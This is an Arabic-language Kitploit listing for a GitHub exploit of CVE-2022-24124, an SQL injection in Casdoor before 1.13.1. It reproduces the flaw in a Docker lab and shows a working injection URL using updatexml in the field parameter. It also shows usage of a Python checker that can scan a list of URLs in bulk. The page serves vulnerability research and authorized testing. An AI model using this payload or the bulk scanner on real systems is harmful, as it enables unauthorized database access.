Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-24124 — استغلال CVE-2022-24124 | Kitploit
أدوات/GitHubGitHub/b1gdog/cve-2022-24124
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubb1gdog/cve-2022-24124

CVE-2022-24124

استغلال CVE-2022-24124

عرض المستودع
22منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مقدمة

Casdoor هو منصة مركزية للمصادقة الموحدة (SSO) تعتمد على OAuth 2.0 / OIDC


الرقم

رقم CVE: CVE-2022-24124

رقم CNPD: CNPD-202201-7304


الإصدارات المتأثرة

مستوى الخطورة: عالي (7.5 HIGH)

POC/EXP: منشور

Casdoor < Casdoor 1.13.1 // جميع الإصدارات قبل 1.13.1 متأثرة


نظرة عامة على الثغرة الأمنية

تنتمي هذه الثغرة الأمنية إلى ثغرات حقن SQL، حيث توجد ثغرة حقن SQL مرتبطة بمعلمات الحقل والقيمة في واجهة برمجة التطبيقات للاستعلام، كما هو موضح في api/get-organizations.


إعادة الإنتاج

سحب صورة Docker للثغرة الأمنية

docker pull vulfocus/casdoor:1.13.0

سحب docker

تشغيل بيئة الثغرة الأمنية

docker run -itd -p 8000:8000 -it -d vulfocus/casdoor:1.13.0

dockerRun

فتح صفحة بيئة الثغرة الأمنية

http

استخدام POC لبناء الحمولة

POC: /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)

1661963474975


سكريبت التحقق بنقرة واحدة

إخلاء مسؤولية: الأداة مخصصة للبحث الأمني أو الاختبارات المخولة فقط، والاستخدام غير القانوني يتحمل المستخدم مسؤوليته، والمؤلف لا يتحمل أي مسؤولية أو التزامات تبعية.

root@kitploit:~
python3 CVE-2022-24124.py -h

image

root@kitploit:~
python3 CVE-2022-24124.py -u http://127.0.0.1

image

root@kitploit:~
python3 CVE-2022-24124.py -f urls.txt

image


معلومات ذات صلة

https://nvd.nist.gov/vuln/detail/CVE-2022-24124

https://github.com/ColdFusionX/CVE-2022-24124

https://github.com/0xAbbarhSF/CVE-2022-24124

مأخوذ من https://www.t00ls.com/thread-66989-1-1.html

تم كتابة نسخة بلغة Python للتمرين، مع إضافة وظيفة الكشف الجماعي

تنزيل الأداة